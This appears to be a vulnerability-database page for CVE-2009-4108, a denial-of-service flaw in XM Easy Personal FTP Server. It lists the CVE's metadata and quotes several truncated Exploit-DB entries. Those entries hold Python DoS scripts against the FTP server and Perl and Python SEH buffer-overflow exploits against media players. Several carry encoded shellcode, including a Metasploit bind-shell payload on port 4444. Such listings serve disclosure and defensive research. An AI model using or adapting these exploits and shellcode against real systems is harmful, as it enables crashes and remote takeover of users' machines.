CVE-2009-4108
published 2009-11-29CVE-2009-4108: XM Easy Personal FTP Server 5.8.0 allows remote authenticated users to cause a denial of service (crash) by uploading or creating a large number of files or…
PriorityP416medium4CVSS 2.0
AVNACLAuSCNINAP
EXPLOIT
EPSS
2.43%
82.2th percentile
XM Easy Personal FTP Server 5.8.0 allows remote authenticated users to cause a denial of service (crash) by uploading or creating a large number of files or directories, then performing a LIST command.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dxm2008 | xm_easy_personal_ftp_server | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
XM Easy Personal FTP Server 5.8.0 - Remote Denial of Service
exploitdb·2009-11-24
CVE-2009-4108 XM Easy Personal FTP Server 5.8.0 - Remote Denial of Service
XM Easy Personal FTP Server 5.8.0 - Remote Denial of Service
---
Date of Discovery: 24-Nov-2009
Credits:leinakesi[at]gmail.com
Vendor: Dxmsoft
Affected:
XM Easy Personal FTP Server 5.8.0
Earlier versions may also be affected
Overview:
XM Easy Personal FTP Server failed to handle more than 2000 files or folders in
the root directory.
Details:
if you could log on the server, take the following steps and the server will
crash which lead to DoS.
1.upload 2000 files or folders.
2.close the current connection.
3.use a ftp client to reconnect the server.
user ...
pass ...
port ...
list ...
crash!!!!!!
Exploit example:
1.upload 2000 folders.
#!/usr/bin/python
import socket
import sys
def Usage():
print ("Usage: ./expl.py \n")
print ("Example:./expl.py 192.168.48.183 anonymous anonymous
Exploit-DB
XM Easy Personal FTP Server - 'APPE' / 'DELE' Denial of Service
exploitdb·2009-11-13
CVE-2009-4108 XM Easy Personal FTP Server - 'APPE' / 'DELE' Denial of Service
XM Easy Personal FTP Server - 'APPE' / 'DELE' Denial of Service
---
#!/usr/bin/python
import socket
import sys
def Usage():
print ("Usage: ./expl.py \n")
print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")
if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
test_string="a"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("Connection error!")
sys.exit(1)
r=sock.recv(1024)
print "[+] "+ r
sock.send("user %s\r\n" %username)
print "[-] "+ ("user %s\r\n" %username)
r=sock.recv(1024)
print "[+] "+ r
sock.send("pass %s\r\n" %passwd)
print "[-] "+ ("pass %s\r\n" %passwd)
r=sock.recv(1024)
print "[+] "+ r
so
Exploit-DB
Ultimate Player 1.56b - '.m3u' / '.upl' Universal Local Buffer Overflow (SEH)
exploitdb·2009-08-31
CVE-2009-3254 Ultimate Player 1.56b - '.m3u' / '.upl' Universal Local Buffer Overflow (SEH)
Ultimate Player 1.56b - '.m3u' / '.upl' Universal Local Buffer Overflow (SEH)
---
#!/usr/bin/perl
# by hack4love
# [email protected]
# Ultimate Player v 1.56 beta (.m3u/upl) Universal Local BOF SEH
####################################################################
my $bof="\x41" x 4108;
my $nsh="\xEB\x06\x90\x90";
my $seh="\xb8\x15\xd1\x72";##tasted under sp2//sp3 univ
my $nop="\x90" x 20;
my $sec=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\
Exploit-DB
PIPL 2.5.0 - '.m3u' Universal Buffer Overflow (SEH)
exploitdb·2009-08-28
CVE-2009-2934 PIPL 2.5.0 - '.m3u' Universal Buffer Overflow (SEH)
PIPL 2.5.0 - '.m3u' Universal Buffer Overflow (SEH)
---
#!/usr/bin/python
#
#############################################################
# PIPL
#
print "[+] Pipl 2.5.0 local exploit"
bof="\x41" * 4108
nsh="\xEB\x06\x90\x90"
seh="\x17\x07\x01\x10" #xaudio.dll ppr
nops="\x90" * 20
# win32_bind - EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum
# http://metasploit.com */
sc = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
"\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
"\x4e\x
Exploit-DB
pIPL 2.5.0 - '.PLS' / '.PL' Universal Local Buffer (SEH)
exploitdb·2009-08-13
CVE-2009-2934 pIPL 2.5.0 - '.PLS' / '.PL' Universal Local Buffer (SEH)
pIPL 2.5.0 - '.PLS' / '.PL' Universal Local Buffer (SEH)
---
#!/usr/bin/perl
# by hack4love
# [email protected]
# pIPL V 2.5.0 (.PLS /.PL) Universal Local Buffer Exploit (SEH)
# http://www.programmedintegration.com/files/pipl.exe
# ## easy #### this work sooooooooo good############################
####################################################################
# USE>>LOAD PLAYLIST>>HACK4LOVE.PLS>>DOUBLE CLICK TO PLAY >BOOM CALC
####################################################################
my $bof="\x41" x 4108;
my $nsh="\xEB\x06\x90\x90";
my $seh="\x17\x07\x01\x10";#xaudio.dll####P/P/R
my $nop="\x90" x 20;
####################################################################
my $sec=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\
Exploit-DB
HT-MP3Player 1.0 - '.ht3' Local Buffer Overflow (SEH)
exploitdb·2009-06-29
CVE-2009-2485 HT-MP3Player 1.0 - '.ht3' Local Buffer Overflow (SEH)
HT-MP3Player 1.0 - '.ht3' Local Buffer Overflow (SEH)
---
#!/usr/bin/perl
# by hack4love
# [email protected]
# HT-MP3Player 1.0 (.ht3 File) Local buffer Overflow (seh)
# # Greetz to all my friends
# form egypt
## easy :d
## Tested on: Windows XP Pro SP2 (EN)
##########################################################
my $bof="\x41" x 4108;
my $nsh="\xEB\x06\x90\x90";
my $seh="\xbe\x2e\xd1\x72";
my $nop="\x90" x 20;
my $sec=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x50\x42\x30\x
No writeups or analysis indexed.
http://secunia.com/advisories/37473http://www.securityfocus.com/archive/1/508049/100/0/threadedhttp://www.securityfocus.com/bid/37112https://exchange.xforce.ibmcloud.com/vulnerabilities/54400http://secunia.com/advisories/37473http://www.securityfocus.com/archive/1/508049/100/0/threadedhttp://www.securityfocus.com/bid/37112https://exchange.xforce.ibmcloud.com/vulnerabilities/54400
2009-11-29
Published